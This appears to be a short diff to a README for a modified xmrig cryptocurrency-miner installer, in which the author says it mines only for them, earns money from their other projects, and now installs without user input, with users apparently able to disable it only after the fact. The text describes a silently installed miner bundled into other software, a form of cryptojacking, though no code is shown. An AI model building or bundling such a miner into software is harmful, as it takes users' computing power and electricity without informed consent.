Leo-Aqua/leos_xmrig_setup/README.md

 Why: I use this to get a bit of money from my projects (you're able to disable this at any time if one of my projects uses this)

-What: This installer of xmrig is modified so that it only mines for me
+What: This installer of xmrig is modified so that it only mines for me and installs without user input
 ## INSTALL

 ### Windows